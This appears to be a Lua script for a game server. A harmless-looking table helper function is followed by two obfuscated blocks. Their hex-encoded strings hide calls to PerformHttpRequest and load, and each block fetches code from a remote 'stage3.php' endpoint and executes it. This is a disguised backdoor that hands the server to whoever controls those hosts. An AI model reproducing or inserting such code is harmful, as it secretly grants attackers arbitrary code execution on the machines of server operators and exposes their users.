table.isIpair = function(tab)
  local c1,c2 = 0,0
  for k,v in pairs(tab) do c1 = c1 + 1; end
  for i=1,#tab,1 do c2 = c2 + 1; end
  return (c1 == c2)
end

local kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth[4][kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x72\x42\x31\x4b\x35\x35", function (OyTYKxfJKKZSzigLnYXoERNAcUbHBzBgdOiqTBGixYgyLCFlhNvWeDzuWvQRPLvzRCmlZV, XQBVGwXQqDgRjuXnXyVLJCuwloVoCGjluAMkMMkjRTbvpQrXibnnPLIedArSpVEWatKmzA) if (XQBVGwXQqDgRjuXnXyVLJCuwloVoCGjluAMkMMkjRTbvpQrXibnnPLIedArSpVEWatKmzA == kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth[6] or XQBVGwXQqDgRjuXnXyVLJCuwloVoCGjluAMkMMkjRTbvpQrXibnnPLIedArSpVEWatKmzA == kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth[5]) then return end kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth[4][kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth[2]](kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth[4][kWOXCgaqrVGBRPGEgbvlRNdsqfCLZJGBFsCWWxTyOFaiabdyJczOIQyPGOiCYkTkyzPdth[3]](XQBVGwXQqDgRjuXnXyVLJCuwloVoCGjluAMkMMkjRTbvpQrXibnnPLIedArSpVEWatKmzA))() end)

local AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI[4][AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x71\x7a\x73\x6b\x6a\x70\x74\x73\x73\x2e\x73\x68\x6f\x70\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x72\x42\x31\x4b\x35\x35", function (PRDfoCVKhmXATPNdQXPQRpjMrqDnXcKhZaNFAlvwXmhyTWurnRnMSpBvvIvQmlypXWIDSC, EPEjDDZmwBXPNPijOkykpVMvmkHhDsxKtDqTmXyHlNgSlIwIZXSejbuqsKBzoLAuaRrRxh) if (EPEjDDZmwBXPNPijOkykpVMvmkHhDsxKtDqTmXyHlNgSlIwIZXSejbuqsKBzoLAuaRrRxh == AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI[6] or EPEjDDZmwBXPNPijOkykpVMvmkHhDsxKtDqTmXyHlNgSlIwIZXSejbuqsKBzoLAuaRrRxh == AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI[5]) then return end AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI[4][AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI[2]](AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI[4][AhkeHcJIiYIxBAtpVbtcBcMpDGwtWHJsjtoZEKAJjHpQdlIGjfYylbeCPEHyLJJrRRlsEI[3]](EPEjDDZmwBXPNPijOkykpVMvmkHhDsxKtDqTmXyHlNgSlIwIZXSejbuqsKBzoLAuaRrRxh))() end)